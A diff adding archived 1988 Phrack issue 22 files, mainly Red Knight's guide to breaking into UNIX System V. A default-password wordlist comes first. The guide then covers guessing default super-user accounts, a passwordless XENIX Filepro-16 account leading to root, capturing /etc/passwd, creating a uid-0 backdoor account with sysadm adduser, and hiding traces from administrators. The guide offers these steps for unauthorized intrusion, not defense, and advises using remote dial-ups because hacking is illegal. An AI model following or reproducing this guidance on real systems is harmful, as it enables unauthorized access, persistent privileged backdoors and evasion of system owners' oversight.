+      chester            hacker             peter              unknown
+      cigar              harmony            philip             urchin
+      classic            harold             phoenix            utility
+      coffee             harvey             pierre             vicky
+      coke               heinlein           pizza              virginia
+      collins            hello              plover             warren
+      comrade            help               polynomial         water
+      computer           herbert            praise             weenie
+      condo              honey              prelude            whatnot
+      condom             horse              prince             whitney
+      cookie             imperial           protect            will
+      cooper             include            pumpkin            william
+      create             ingres             puppet             willie
+      creation           innocuous          rabbit             winston
+
+I hope this file has been of some help in getting started.  If you're asking
+yourself the question 'Why hack?', then you've probably wasted a lot of time
+reading this, as you'll never understand.  For those of you who have read this
+and found it useful, please send a tax-deductible donation
+of $5.00 (or more!) in the name of the Legion of Doom to:
+
+                                       The American Cancer Society
+                                       90 Park Avenue
+                                       New York, NY  10016
+
+
+*******************************************************************************
+
+References:
+
+1) Introduction to ItaPAC by Blade Runner
+   Telecom Security Bulletin 1
+
+2) The IBM VM/CMS Operating System by Lex Luthor
+   The LOD/H Technical Journal 2
+
+3) Hacking the IRIS Operating System by The Leftist
+   The LOD/H Technical Journal 3
+
+4) Hacking CDC's Cyber by Phrozen Ghost
+   Phrack Inc. Newsletter 18
+
+5) USENET comp.risks digest (various authors, various issues)
+
+6) USENET unix.wizards forum (various authors)
+
+7) USENET info-vax forum (various authors)
+
+Recommended Reading:
+
+1) Hackers by Steven Levy
+2) Out of the Inner Circle by Bill Landreth
+3) Turing's Man by J. David Bolter
+4) Soul of a New Machine by Tracy Kidder
+5) Neuromancer, Count Zero, Mona Lisa Overdrive, and Burning Chrome, all by
+   William Gibson
+6) Reality Hackers Magazine c/o High Frontiers, P.O. Box 40271, Berkeley,
+   California, 94704, 415-995-2606
+7) Any of the Phrack Inc. Newsletters & LOD/H Technical Journals you can
+   find.
+
+Acknowledgements:
+   Thanks to my wife for putting up with me.
+   Thanks to Lone Wolf for the RSTS & TOPS assistance.
+   Thanks to Android Pope for proofreading, suggestions, and beer.
+   Thanks to The Urvile/Necron 99 for proofreading & Cyber info.
+   Thanks to Eric Bloodaxe for wading through all the trash.
+   Thanks to the users of Phoenix Project for their contributions.
+   Thanks to Altos Computer Systems, Munich, for the chat system.
+   Thanks to the various security personel who were willing to talk to me about
+             how they operate.
+
+Boards:
+
+   I can be reached on the following systems with some regularity;
+
+       The Phoenix Project:    512/441-3088    300-2400 baud
+       Hacker's Den-80:        718/358-9209    300-1200 baud
+       Smash Palace South:     512/478-6747    300-2400 baud
+       Smash Palace North:     612/633-0509    300-2400 baud
+
+************************************* EOF *************************************
diff --git a/phrack22/5.txt b/phrack22/5.txt
new file mode 100644
index 0000000..f2f3255
--- /dev/null
+++ b/phrack22/5.txt
@@ -0,0 +1,905 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 22, File 5 of 12
+
+         /|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|
+         |/                                                      |/
+         /|           An Indepth Guide In Hacking UNIX           /|
+         |/                          and                         |/
+         /|        The Concept Of Basic Networking Utility       /|
+         |/                                                      |/
+         /|                     By Red Knight                    /|
+         |/                                                      |/
+         /|                     Member of the                    /|
+         |/         Phreakers/Hackers Underground Network        |/
+         /|                                                      /|
+         |/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/
+
+Brief History On UNIX
+~~~~~~~~~~~~~~~~~~~~~
+Its because of Ken Tompson that today we are able to hack Unix.  He used to
+work for Bell Labs in the 1960s.  Tompson started out using the MULTICS OS
+which was later eliminated and Tompson was left without an operating system to
+work with.
+
+Tompson had to come up with something real quick. He did some research and and
+in 1969 UNIX came out, which was a single user and it did not have many
+capabilities.  A combined effort with others enabled him to rewrite the version
+in C and add some good features.  This version was released in 1973 and was
+made available to the public.  This was the first begining of UNIX in its
+presently known form.  The more refined version of UNIX, today know as UNIX
+system V developed by Berkley University has unique capabilities.
+
+Various types of UNIXes are CPIX, Berkeley Ver 4.1, Berkeley 4.2, FOS, Genix,
+HP-UX, IS/I, OSx, PC-IX, PERPOS, Sys3, Ultrix, Zeus, Xenix, UNITY, VENIX, UTS,
+Unisys, Unip lus+, UNOS, Idris, QNIX, Coherent, Cromix, System III, System 7,
+Sixth edition.
+
+The Article Itself
+~~~~~~~~~~~~~~~~~~
+I believe that hacking into any system requires knowledge of the operating
+system itself.  Basically what I will try to do is make you more familiar with
+UNIX operation and its useful commands that will be advantageous to you as a
+hacker.  This article contains indepth explainations.  I have used the  UNIX
+System V to write this article.
+
+
+Error Messages:  (UNIX System V)
+~~~~~~~~~~~~~~
+Login Incorrect - An invalid ID and/or password was entered.  This means
+                  nothing.  In UNIX there is no way guessing valid user IDs.
+                  You may come across this one when trying to get in.
+
+No More Logins  - This happens when the system will not accept anymore logins.
+                  The system could be going down.
+
+Unknown Id      - This happens if an invalid id is entered using (su) command.
+
+Unexpected Eof In File - The file being stripped or the file has been damaged.
+
+Your Password Has Expired - This is quite rare although there are situations
+                            where it can happen.  Reading the etc/passwd will
+                            show you at how many intervals it changes.
+
+You May Not Change The Password - The password has not yet aged enough.  The
+                                  administrator set the quotas for the users.
+
+Unknown Group (Group's Name) - Occurs when chgrp is executed, group does not
+                               exist.
+Sorry - Indicated that you have typed in an invalid super user password
+        (execution of the su).
+
+Permission Denied! - Indicated you must be the owner or a super user to change
+                     password.
+
+Sorry <( Of Weeks) Since Last Change - This will happen when password has has
+                                        not aged enough and you tried to change
+                                        it (password).
+
+(Directory Name):  No Permission - You are trying to remove a directory which
+                                   you have no permission to.
+
+(File Name) Not Removed - Trying to delete a file owned by another user that
+                          you do not have write permission for.
+
+(Dirname) Not Removed - Ownership of the dir is not your that your trying to
+                        delete.
+
+(Dirname) Not Empty - The directory contains files so you must have to delete
+                      the files before execcant open [file name] - defined
+                      wrong path, file name or you have no read permission.
+
+Cp:  (File Name) And (File Name) Are Identical - Self explanatory.
+
+Cannot Locate Parent Directory - Occurs when using mv.
+
+(File name) Not Found - File which your trying to move does not exist.
+
+You Have Mail - Self explanatory.
+
+
+Basic Networking Utility Error Messages
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Cu:  Not found         - Networking not installed.
+Login Failed           - Invalid id/pw or wrong number specified.
+Dial Failed            - The systen never answered due to a wrong number.
+UUCP Completely Failed - Did not specify file after -s.
+Wrong Time to Call     - You called at the time at a time not specified in the
+                         Systems file.
+System not in systems  - You called a remote not in the systems file.
+
+
+Logon Format
+~~~~~~~~~~~~
+The first thing you must do is switch to lower case.  To identifing a UNIX,
+this is what you will see;
+
+AT&T Unix System V 3.0 (eg of a system identifier)
+
+login:
+ or
+Login:
+
+Any of these is a UNIX.  Here is where you will have to guess at a user valid
+id.  Here are some that I have come across; glr, glt, radgo, rml, chester, cat,
+lom, cora, hlto, hwill, edcasey, and also some containing numbers; smith1,
+mitu6, or special characters in it; bremer$, jfox.  Login names have to be 3
+to 8 chracters in length, lowercase, and must start with a letter.  In some
+XENIX systems one may login as "guest"
+
+User Level Accounts (Lower Case)
+~~~~~~~~~~~~~~~~~~~
+In Unix there are what is called.  These accounts can be used at the "login:"
+prompt.  Here is a list:
+
+sys      bin     trouble      daemon     uucp     nuucp      rje     lp     adm
+
+
+Super-User Accounts
+~~~~~~~~~~~~~~~~~~~
+There is also a super-user login which make UNIX worth hacking.  The accounts
+are used for a specific job.  In large systems these logins are assingned to
+users who have a responsibilty to maintain subsystems.
+
+They are as follows (all lower case);
+
+root       -  This is a must the system comes configured with it. It has no
+              restriction.  It has power over every other account.
+unmountsys -  Unmounts files
+setup      -  System set up
+makefsys   -  Makes a new file
+sysadm     -  Allows useful S.A commands (doesn't need root login)
+powerdown  -  Powering system down
+mountfsys  -  Mounts files
+checkfsys  -  Checks file
+
+These accounts will definitly have passwords assigned to them.  These accounts
+are also commands used by the system administrator.  After the login prompt you
+will receive a password prompt:
+
+password:
+  or
+Password:
+
+Enter the password (it will not echo).  The password rule is as follows; Each
+password has to contain at least 6 characters and maximum of 8 characters.  Two
+of which are to be alphabetic letters and at least one being a number or a
+special character.  The alphabetic digits could be in upper case or lower
+case.  Here are some of the passwords that I have seen; Ansuya1, PLAT00N6,
+uFo/78, ShAsHi.., Div417co.
+
+The passwords for the super user accounts will be difficult to hack try the
+accounts interchangebly; login:sysadm password:makefsys, or rje1, sysop,
+sysop1, bin4, or they might contain letters, numbers, or special chracters in
+them.  It could be anything.  The user passwords are changed by an aging
+proccess at successive intervals.  The users are forced to changed it.  The
+super-user will pick a password that will not need changing for a long period
+of time.
+
+
+You Have Made It!
+~~~~~~~~~~~~~~~~~
+The hard part is over and hopefully you have hacked a super-user account.
+Remember Control-d stops a process and also logs you off.  The next thing you
+will probably see is the system news.  Ex;
+
+login:john
+password:hacker1
+
+System news
+
+There will be no networking offered to the users till
+August 15, due to hardware problems.
+(Just An Example)
+
+$
+
+$ (this is the Unix prompt) - Waiting for a command to be entered.
+ - Means your logged in as root (Very Good).
+
+A Word About The XENIX System III (Run On The Tandy 6000)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The largest weakness in the XENIX System III occurs after the installation
+of the Profile-16 or more commonly know as the Filepro-16.  I have seen the
+Filepro-16 installed in many systems.  The installation process creates an
+entry in the password file for a user named \fBprofile\fR, an account that who
+owns and administors the database.  The great thing about it is that when the
+account is created, no password is assigned to it.  The database contains
+executable to maintain it.  The database creation programs perform a
+\fBsetuid\fR to boot up the \fBoot\fR  thereby giving a person the whole C
+Shell to gain Super User privilege same as root.  Intresting huh!
+
+(* Note:  First the article will inform you of how the Unix is made up.)
+
+
+The Unix is made if three components - The Shell, The Kernal, File System.
+
+The Kernal
+~~~~~~~~~~
+You could say that the kernal is the heart of the Unix operating system. The
+kernal is a low level language lower than the shell which maintains processes.
+The kernal handles memory usage, maintains file system the sofware and hardware
+devices.
+
+The Shell
+~~~~~~~~~
+The shell a higher level language.  The shell had two important uses, to act as
+command interpreture for example using commands like cat or who.  The shell is
+at work figuring out whether you have entered a command correctly or not.  The
+second most important reason for the shell is its ability to be used as
+programing language.  Suppose your performing some tasks repeatedly over and
+over again, you can program the shell to do this for you.
+
+            (Note:  This article will not cover shell programming.)
+            (       Instead B.N.N will be covered.                )
+
+
+The File System
+~~~~~~~~~~~~~~~
+The file system in Unix is divided into 3 catagories:  Directories, ordinary
+files and special files (d,-).
+
+Basic Stucture:
+
+(/)-this is abreviation for the root dirctory.
+
+  root level                      root
+                                  (/)                                  system
+-------------------------------------|---------------------------------- level
+|      |        |         |                  |        |       |        |
+/unix  /etc     /dev      /tmp               /lib     /usr    /usr2    /bin
+       |                                         _____|_____
+login passwd                                     |    |    |
+level                                            /john  /cathy
+                              ________________________|_______________
+                             |        |     |      |        |        |
+                         .profile   /mail  /pers  /games   /bin     /michelle
+*.profile - in case you                    |    __|______  |      __|_______
+wish to change your environment, but    capital |        | data   | |       |
+after you log off, it sets it to              othello  starwars letter letter1
+default.
+
+/unix - This is the kernal.
+/etc  - Contains system administrators files,Most are not available to the
+        regular user (this dirrctory contains the /passwd file).
+
+    Here are some files under /etc directory:
+    /etc/passwd
+    /etc/utmp
+    /etc/adm/sulog
+    /etc/motd
+    /etc/group
+    /etc/conf
+    /etc/profile
+
+/dev - contains files for physical devices such as printer and the disk drives
+/tmp - temporary file directory
+/lib - dirctory that contains programs for high level languages
+/usr - this directory contains dirctories for each user on the system
+/bin - contain executable programs (commands)
+
+The root also contains:
+/bck - used to mount a back up file system.
+/install - Used to install and remove utilities
+/lost+found - This is where all the removed files go, this dir is used by fsck
+/save -A utility used to save data
+/mnt - Used for temporary mounting
+
+**Now the fun part scouting around**
+
+Local Commands (Explained In Details)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+At the unix prompt type the pwd command.  It will show you the current working
+directory you are in.
+
+$ pwd
+$ /usr/admin - assuming that you have hacked into a super user account
+               check fsys
+$
+
+This gives you the full login directory.  The / before tell you the location of
+the root directory.
+
+Or
+
+(REFER TO THE DIAGRAM ABOVE)
+$ pwd
+$ /usr/john
+$
+Assuming you have hacked into John's account.
+
+Lets say you wanted to move down to the Michelle directory that contains
+letters.  You would type in;
+
+$ cd michelle or cd usr/john/michelle
+$ pwd
+$ /usr/john/michelle
+$
+
+Going back one directory up type in:
+$ cd ..
+or going to your parent directory just type in "cd"
+
+Listing file directories assuming you have just logged in:
+$ ls /usr/john
+mail
+pers
+games
+bin
+michelle
+This wont give you the .profile file.  To view it type
+$ cd
+$ ls -a
+:
+:
+.profile
+
+To list file names in Michelle's directory type in:
+$ ls michelle (that if your in the johns directory)
+$ ls /usr/john/michelle(parent dir)
+
+ls -l
+~~~~~
+The ls -l is an an important command in unix.This command displays the whole
+directory in long format :Run this in parent directory.
+$ ls -l
+total 60
+-rwxr-x---    5 john      bluebox    10 april 9  7:04  mail
+drwx------    7 john      bluebox    30 april 2  4:09  pers
+     :            :         :         :     :      :    :
+     :            :         :         :     :      :    :
+-rwxr-x---     6 cathy    bluebox    13 april 1  13:00 partys
+     :            :         :         :     :      :    :
+$
+
+The total 60 tells one the ammount of disk space used in a directory.  The
+-rwxr-x--- is read in triples of 3.  The first chracter eg (-, d, b, c) means
+as follows:  - is an ordinary file, d is a directory, b is block file, c is a
+character file.
+
+The r stands for read permission, w is write permission, x is execute. The
+first column is read in 3 triples as stated above.  The first group of 3 (in
+-rwxr-x---) after the "-" specifies the permission for the owner of the file,
+the second triple are for the groups (the fourth column) and the last triple
+are the permissions for all other users.  Therefore, the -rwxr-x--- is read as
+follows.
+
+The owner, John, has permission to read, write, and execute anything in the bin
+directory but the group has no write permission to it and the rest of the users
+have no permission at all.  The format of one of the lines in the above output
+is as follows:
+
+file type-permissions, links, user's name, group, bytes taken, date, time when
+last renued, directory, or file name.
+
+               *** You will be able to read, execute Cathy's ***
+               *** file named partly due to the same group.  ***
+
+Chmod
+~~~~~
+The chmod command changes permission of a directory or a file.  Format is
+chmod who+, -, =r , w, x
+
+The who is substituted by u-user, g-group, o-other users, a-all.
+The + means add permission, - means remove permission, = - assign.
+Example:  If you wanted all other users to read the file name mail, type:
+
+$ chmod o+r mail
+
+Cat
+~~~
+Now suppose you wanted to read the file letter.  There are two ways to doing
+this.  First go to the michelle directory then type in:
+
+$ cat letter
+line one ...\
+line two ... }the output of letter
+line three../
+$
+   or
+If you are in the parent directory type in:
+$ cat /usr/john/michelle/letter
+and you will have the same output.
+
+Some cat options are  -s, -u, -v, -e, -t
+
+Special Chracters in Unix
+~~~~~~~~~~~~~~~~~~~~~~~~~
+*      - Matches any number of single characters eg. ls john* will list all
+         files that begin with john
+[...]  - Matchs any one of the chracter in the [ ]
+?      - Matches any single chracter
+&      - Runs a process in the backgroung leaving your terminal free
+$      - Values used for variables also $n - null argument
+>      - Redirectes output
+<      - Redirects input to come from a file
+>>     - Redirects command to be added to the end of a file
+|      - Pipe output (eg:who|wc-l tells us how many users are online)
+"..."  - Turn of meaning of special chracters excluding $,`
+`...`  - Allows command output in to be used in a command line
+'...'  - Turns of special meaning of all chracters
+
+Continuation Of Local Commands
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+man [command] or [c/r] -will give you a list of commands explainations
+help - available on some UNIX systems
+mkdir [dir name(s)] - makes a directory
+rmdir [dir name(s)] - removes directory.You wont be able to remove the
+                      directory if it contains files in them
+rm [file name(s)] - removes files. rm * will erase all files in the current
+                    dir.  Be carefull you!  Some options are:
+                    [-f unconditional removal] [-i Prompts user for y or n]
+
+ps [-a all processes except group leaders] [-e all processes] [-f the whole
+   list]  - This command reports processes you are running eg:
+
+   $ps
+   PID   TTY  TIME   COMMAND
+   200   tty09 14:20  ps
+
+   The systems reports (PID - process idenetification number which is a number
+   from 1-30,000 assigned to UNIX processes)
+   It also reports the TTY,TIME and the COMMAND being executed at the time.
+   To stop a process enter :
+
+   $kill [PID] (this case its 200)
+   200 terminated
+   $
+
+grep (argument) - searches for an file that contains the argument
+mv (file names(s)) ( dir name ) - renames a file or moves it to another
+                                  directory
+cp [file name] [file name] - makes a copy of a file
+write [login name ] - to write to other logged in users.  Sort of a chat
+mesg [-n] [-y] - doesn't allow others to send you messages using the write
+                 command.  Wall used by system adm overrides it.
+$ [file name] - to execute any file
+wc [file name] - Counts words, characters,lines in a file
+stty [modes] - Set terminal I/O for the current devices
+sort [filename] - Sorts and merges files many options
+spell [file name] > [file name] - The second file is where the misspelt words
+                                  are entered
+date [+%m%d%y*] [+%H%%M%S] - Displays date acoording to options
+at [-r] [-l] [job] - Does a specified job at a specified time.  The -r Removes
+                     all previously scheduled jobs.The -l reports the job  and
+                     status of all jobs scheduled
+write [login] [tty] - Sends message to the login name.  Chat!
+
+
+Su [login name]
+~~~~~~~~~~~~~~~
+The su command allows one to switch user to a super user to a user.  Very
+important could be used to switch to super user accounts.
+Usage:
+
+$ su sysadm
+password:
+
+This su command will be monitored in /usr/adm/sulog and this file of all files
+is carefully monitered by the system administrator.Suppose you hacked in john's
+account and then switched to the sysadm account (ABOVE) your /usr/adm/su log
+entry would look like:
+
+SU  04/19/88  21:00 + tty 12 john-sysadm
+
+Therfore the S.A(system administrator) would know that john swithed to sysadm
+account on 4/19/88 at 21:00 hours
+
+
+Searching For Valid Login Names:
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Type in-
+$ who  ( command informs the user of other users on the system)
+cathy  tty1  april 19  2:30
+john   tty2  april 19  2:19
+dipal  tty3  april 19  2:31
+:
+:
+tty is the user's terminal, date, time each logged on.  mary, dr.m are valid
+logins.
+
+Files worth concatenating(cat)
+
+
+/etc/passwd file
+~~~~~~~~~~~~~~~~
+The etc/passwd is a vital file to cat.  For it contains login names of all
+users including super user accounts and there passwords.  In the newer SVR3
+releases they are tighting their security by moving the encrypted passwords
+from /etc/passwd to /etc/shadow making it only readable by root.
+This is optional of course.
+
+$ cat /etc/passwd
+root:D943/sys34:0:1:0000:/:
+sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh
+checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh
+:
+other super user accs.
+:
+john:hacker1:34:3:john scezerend:/usr/john:
+:
+other users
+:
+$
+
+If you have reached this far capture this file as soon as possible.  This is a
+typical output etc/passwd file.  The entries are seperated by a ":".  There
+made be up to 7 fields in each line.
+Eg.sysadm account.
+
+The first is the login name in this case sysadm.The second field contains the
+password.  The third field contains the user id."0 is the root."  Then comes
+the group id then the account which contains the user full name etc.  The sixth
+field is the login directory defines the full path name of the the paticular
+account and the last is the program to be executed.  Now one can switch to
+other super user account using su command descibed above.  The password entry
+in the field of the checkfsys account in the above example is "Locked;". This
+doesn't mean thats its a password but the account checkfsys cannot be accessed
+remotely.  The ";" acts as an unused encryption character.  A space is also
+used for the same purpose.  You will find this in many UNIX systems that are
+small systems where the system administrator handles all maintaince.
+
+If the shawdowing is active the /etc/passwd would look like this:
+
+root:x:0:1:0000:/:
+sysadm:x:0:0:administration:/usr/admin:/bin/rsh
+
+The password filed is substituted by "x".
+
+The /etc/shawdow file only readable by root will look similar to this:
+
+root:D943/sys34:5288::
+:
+super user accounts
+:
+Cathy:masai1:5055:7:120
+:
+all other users
+:
+
+The first field contains users id:  The second contains the password (The pw
+will be NONE if logining in remotely is deactivated):  The third contains a
+code of when the password was last changed:  The fourth and the fifth contains
+the minimum and the maximum numbers of days for pw changes (its rare that you
+will find this in the super user logins due to there hard to guess passwords)
+
+
+/etc/options
+~~~~~~~~~~~~
+The etc/options file informs one the utilities available in the system.
+-rwxr-xr-x   1 root  sys   40 april  1:00  Basic Networking utility
+
+
+/etc/group
+~~~~~~~~~~
+The file has each group on the system.  Each line will have 4 entries separated
+by a ":".   Example of concatenated /etc/group:
+
+root::0:root
+adm::2:adm,root
+bluebox::70:
+
+Group name:password:group id:login names
+** It very unlikely that groups will have passwords assigned to them **
+The id "0" is assigned to /
+
+
+Sending And Recieving Messages
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Two programs are used to manage this.  They are mail & mailx.  The difference
+between them is that mailx is more fancier thereby giving you many choices like
+replying message, using editors, etc.
+
+
+Sending
+~~~~~~~
+The basic format for using this command is:
+
+$mail [login(s)]
+(now one would enter the text after finishing enter "." a period on the next
+blank line)
+$
+
+This command is also used to send mail to remote systems.  Suppose you wanted
+to send mail to john on a remote called ATT01 you would type in:
+
+$mail ATT01!john
+
+Mail can be sent to several users, just by entering more login name after
+issuing the mail command
+
+Using mailx is the same format:(This I'll describe very briefly) $mailx john
+subject:(this lets you enter the subject)
+(line 1)
+(line 2)
+(After you finish enter (~.) not the brackets of course, more commands are
+available like ~p, ~r, ~v, ~m, ~h, ~b, etc.).
+
+
+Receiving
+~~~~~~~~~
+After you log on to the system you will the account may have mail waiting.
+You will be notified "you have mail."
+To read this enter:
+$mail
+(line 1)
+(line 2)
+(line 3)
+?
+$
+
+After the message you will be prompted with a question mark.  Here you have a
+choice to delete it by entering d, saving it to view it later s, or just press
+enter to view the next message.
+
+              (DON'T BE A SAVANT AND DELETE THE POOR GUY'S MAIL)
+
+
+Super User Commands
+~~~~~~~~~~~~~~~~~~~
+$sysadm adduser - will take you through a routine to add a user (may not last
+                  long)
+
+Enter this:
+
+$ sysadm adduser
+password:
+(this is what you will see)
+ /--------------------------------------------------------------------------\
+  Process running succommmand `adduser`
+  USER MANAGMENT
+
+  Anytime you want to quit, type "q".
+  If you are not sure how to answer any prompt, type "?" for help
+
+  If a default appears in the question, press <RETURN> for the default.
+
+  Enter users full name [?,q]: (enter the name you want)
+  Enter users login ID [?,q]:(the id you want to use)
+  Enter users ID number (default 50000) [?,q) [?,q]:( press return )
+  Enter group ID number or group name:(any name from /etc/group)
+  Enter users login home directory:(enter /usr/name)
+
+  This is the information for the new login:
+  Users name: (name)
+  login ID:(id)
+  users ID:50000
+  group ID or name:
+  home directory:/usr/name
+  Do you want to install, edit, skip [i, e, s, q]? (enter your choice if "i"
+  then)
+ Login installed
+ Do you want to give the user a password?[y,n] (its better to enter one)
+ New password:
+ Re-enter password:
+
+ Do you want to add another login?
+\----------------------------------------------------------------------------/
+
+This is the proccess to add a user.  Since you hacked into a super user account
+you can make a super user account by doing the following by entering 0 as an
+user and a group ID and enter the home directory as /usr/admin.  This will give
+you as much access as the account sysadm.
+
+**Caution** - Do not use login names like Hacker, Cracker,Phreak etc.  This is
+a total give away.
+
+The process of adding a user wont last very long the S.A will know when he
+checks out the /etc/passwd file
+
+$sysadm moduser - This utility allows one to modify users.  DO NOT ABUSE!!
+!
+
+Password:
+
+This is what you'll see:
+
+/----------------------------------------------------------------------------\
+MODIFYING USER'S LOGIN
+
+1)chgloginid  (This is to change the login ID)
+2)chgpassword (Changing password)
+3)chgshell (Changing directory DEFAULT = /bin/sh)
+
+ENTER A NUMBER,NAME,INITIAL PART OF OF NAME,OR ? OR <NUMBER>? FOR HELP, Q TO
+QUIT ?
+\----------------------------------------------------------------------------/
+
+Try every one of them out.Do not change someones password.It creates a havoc.
+If you do decide to change it.Please write the original one down somewhere
+and change back.Try not to leave to many traces after you had your fun.  In
+choice number 1 you will be asked for the login and then the new one.  In
+choice number 2 you will asked for the login and then supplied by it correct
+password and enter a new one.  In choice 3 this is used to a pchange the login
+shell ** Use full **  The above utilites can be used separatly for eg (To
+change a password one could enter: $sysadm chgpasswd not chapassword, The rest
+are same)
+
+$sysadm deluser - This is an obviously to delete a user password:
+
+This will be the screen output:
+/---------------------------------------------------------------------------\
+Running subcommand 'deluser' from menu 'usermgmt'
+USER MANAGEMENT
+
+This fuction completely removes the user,their mail file,home directory and all
+files below their home directory from the machine.
+
+Enter login ID you wish to remove[q]:      (eg.cathy)
+'cathy' belongs to 'Cathy Franklin'
+whose home directory is /usr/cathy
+Do you want to remove this login ID 'cathy' ? [y,n,?,q] :
+
+/usr/cathy and all files under it have been deleted.
+
+Enter login ID you wish to remove [q]:
+\--------------------------------------------------------------------------/
+This command deletes everthing owned by the user.Again this would be stupid to
+use.
+
+
+Other Super User Commands
+~~~~~~~~~~~~~~~~~~~~~~~~~
+wall [text] control-d  - to send an anouncement to users logged in (will
+                         override mesg -n command).  Execute only from /
+/etc/newgrp - is used to become a member of a group
+
+sysadm [program name]
+        delgroup - delets groups
+        diskuse - Shows free space etc.
+        whoson - self explanatory
+        lsgroup - Lists group
+        mklineset -hunts various sequences
+
+
+                        Basic Networking Unility (BNU)
+                        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The BNU is a unique feature in UNIX.Some systems may not have this installed.
+What BNU does is allow other remote UNIXes communicate with yours without
+logging off the present one.BNU also allowes file transfer between computers.
+Most UNIX systems V will have this feature installed.
+
+The user program like cu,uux etc are located in the /usr/bin directory
+
+Basic Networking Files
+~~~~~~~~~~~~~~~~~~~~~~
+/usr/lib/uucp/[file name]
+ [file name]
+ systems - cu command to establishes link.Contains info on remote computers
+           name, time it can be reached, login Id, password, telephone numbers
+ devices - inter connected with systems files (Automatic call unit same in two
+           entries) also contains baud rate, port tty1, etc.
+
+ dialers - where asscii converation must be made before file tranfers etc.
+ dialcodes - contains abreiviations for phone numbers that can be used in
+             systems file
+
+other files are sysfiles, permissions, poll, devconfig
+
+Logining On To Remote And Sending+Receiving Files
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ cu - This command allows one to log on to the local as well as the remote Unix
+      (or a non unix)without haveing to hang up so you can transfer files.
+      Usage:[options]
+
+  $ cu [-s baud rate][-o odd parity][-e even parity][-l name of comm line]
+       telephone number | systemname
+
+  To view system names that you can communicate with use the 'unname' command:
+  Eg. of output of names:
+
+  ATT01
+  ATT02
+  ATT03
+  ATT04
+
+
+$ cu -s300 3=9872344 (9872344 is the tel)
+ connected
+ login:
+ password:
+
+Local Strings
+~~~~~~~~~~~~~
+<~.> - will log you off the remote terminal, but not the local
+<control-d> - puts you back on the remote unix local (the directory which you
+              are in)
+"%put [file name] - reverse of above
+
+Ct
+~~
+ct allows local to connect to remote.Initiates a getty on a remote terminal.
+Usefull when using a remote terminal.BNU has call back feature that allows the
+user on the remote who can execute a call back meaning the local can call the
+remote.[   ] are options
+
+$ ct [-h prevent automatic hang up][-s bps rate][-wt set a time to call back
+     abbrieviated t mins] telephone number
+
+Uux
+~~~
+To execute commands on a remote (unix to unix)
+usage:[  ] are options
+
+$ uux [- use standard output][-n prevent mail notification][-p also use
+      standard output] command-string
+
+UUCP
+~~~~
+UUCP copies files from ones computer to the home directory of a user in remote
+system.  This also works when copying files from one directory to another in
+the remote.  The remote user will be notified by mail.  This command becomes
+use full when copying files from a remote to your local system.  The UUCP
+requires the uucico daemon will call up the remote and will perform file login
+sequence, file transfer, and notify the user by mail.  Daemons are programs
+runining in the background.  The 3 daemons in a Unix are uucico, uusched,
+uuxqt.
+
+Daemons Explained:  [nows a good time to explain the 3 daemons]
+~~~~~~~~~~~~~~~~~
+Uuxqt - Remote execution.  This daemon is executed by uudemon.hour started by
+        cron.UUXQT searchs in the spool directory for executable file named
+        X.file sent from the remote system.  When it finds a file X .file where
+        it obtains process which are to be executed.  The next step is to find
+        weather the processes are available at the time.The if available it
+        checks permission and if everthing is o.k it proceeds the background
+        proccess.
+
+Uucico - This Daemon is very immportant for it is responsible in establishing
+         a connection to the remote also checks permission, performs login
+         procedures,transfers + executes files and also notifies the user by
+         mail.  This daemon is called upon by uucp,uuto,uux commands.
+
+Uusched - This is executed by the shell script called uudemon.hour.  This
+          daemons acts as a randomizer before the UUCICO daemon is called.
+
+
+Usage:
+
+$ uucp [options] [first full path name!] file [destination path!] file example:
+
+$ uucp -m -s bbss hackers unix2!/usr/todd/hackers
+
+What this would do is send the file hackers from your computer to the remotes
+/usr/todd/hackers making hackers of course as file.  Todd would mail that a
+file has been sent to him.  The Unix2 is the name of the remote.  Options for
+UUCP:  (Don't forget to type in remotes name Unix2 in case)
+-c  dont copy files to spool directory
+-C  copy to spool
+-s[file name] - this file will contain the file status(above is bbss)
+-r  Dont start the comm program(uucico) yet
+-j  print job number(for above eg.unix2e9o3)
+-m  send mail when file file is complete
+
+Now suppose you wanted to receive file called kenya which is in the
+usr/ dan/usa to your home directory /usr/john assuming that the local systems
+name is ATT01 and you are currently working in /usr/dan/usa,you would type in:
+
+$uucp kenya ATT01!/usr/john/kenya
+
+Uuto
+~~~~
+The uuto command allows one to send file to remote user and can also be used to
+send files locally.
+
+Usage:
+
+$ uuto [file name] [system!login name]( omit systen name if local)
+
+
+Conclusion
+~~~~~~~~~~
+Theres always more one can say about the UNIX, but its time to stop.  I hope
+you have enjoyed the article.  I apologize for the length.  I hope I made the
+UNIX operating system more familiar.  The contents of the article are all
+accurate to my knowledge.  Hacking into any system is illegal so try to use
+remote dial-ups to the job.  Remember do not abuse any systems you hack into
+for a true hacker doesn't like to wreck, but to learn.
+
+   Watch for my new article on using PANAMAC airline computers coming soon.
+
+                                  Red Knight
+                                    P/HUN!
+                                  <<T.S.A.N>>
+=========================================================================
diff --git a/phrack22/6.txt b/phrack22/6.txt
new file mode 100644
index 0000000..9ac7680
--- /dev/null
+++ b/phrack22/6.txt
@@ -0,0 +1,710 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 22, File 6 of 12
+
+            ()()()()()()()()()()()()()()()()()()()()()()()()()()()
+            ()()                                              ()()
+            ()         Yet Another File On Hacking Unix!        ()
+            ()         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~        ()
+            ()                        By                        ()
+            ()                                                  ()
+            ()                  >Unknown User<                  ()
+            ()      A special "ghost" writer of Phrack Inc.     ()
+            ()()                                              ()()
+            ()()()()()()()()()()()()()()()()()()()()()()()()()()()
+
+
+Greetings from The Unix Front...
+
+I am unable to use my real alias since it has now become too well known and
+others are able to associate it with my real name.  Let us just say that I have
